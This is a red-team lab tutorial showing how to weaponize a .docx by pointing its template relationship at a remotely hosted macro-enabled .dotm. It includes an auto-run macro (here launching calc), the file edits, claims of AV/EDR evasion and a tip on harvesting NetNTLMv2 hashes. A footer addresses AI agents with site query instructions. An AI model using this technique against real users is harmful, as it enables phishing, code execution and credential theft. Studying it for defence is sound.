# Inject Macros from a Remote Dotm Template

This lab shows how it is possible to add a macros payload to a docx file indirectly, which has a good chance of evading some AVs/EDRs. 

This technique works in the following way:

1. A malicious macro is saved in a Word template .dotm file
2. Benign .docx file is created based on one of the default MS Word Document templates
3. Document from step 2 is saved as .docx
4. Document from step 3 is renamed to .zip
5. Document from step 4 gets unzipped
6. .\word\_rels\settings.xml.rels contains a reference to the template file. That reference gets replaced with a refernce to our malicious macro created in step 1. File can be hosted on a web server (http) or webdav (smb).
7. File gets zipped back up again and renamed to .docx
8. Done

## Weaponization

Alt+F8 to enter Dev mode where we can edit Macros, select `ThisDocument` and paste in:

{% code title="Doc3.dotm" %}

```javascript
Sub Document_Open()

Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc"

End Sub
```

{% endcode %}

![](/files/-LaHsr9Df6zSyClDXreO)

Create a benign .docx file based on one of the provided templates and save it as .docx:

![](/files/-LaHtw6A6pSqS8yRT_4D)

Rename legit.docx to legit.zip:

![](/files/-LaHuXVOCz0pu04UlGl4)

Unzip the archive and edit `word_rels\settings.xml.rels`:

{% code title="word\_rels\settings.xml.rels" %}

```markup
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file:///C:\Users\mantvydas\AppData\Roaming\Microsoft\Templates\Polished%20resume,%20designed%20by%20MOO.dotx" TargetMode="External"/></Relationships>
```

{% endcode %}

Note it has the target template specified here:

![](/files/-LaHwmHfhmC9WmqXqAi0)

Upload the template created previously `Doc3.dot` to an SMB server (note that the file could be hosted on a web server also!).

Update word\_rels\settings.xml.rels to point to Doc3.dotm:

![](/files/-LaI0x6LlzkBHXCcae2k)

Zip all the files of `legit` archive and name it back to .docx - we now have a weaponized document:

![](/files/-LaI2n9iw2zGOJSlqKFI)

{% hint style="info" %}
Note that this technique could be used to steal NetNTLMv2 hashes since the target system is connecting to the attacking system - a responder can be listening there.
{% endhint %}

## References

{% embed url="<http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office/inject-macros-from-a-remote-dotm-template-docx-with-macros.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.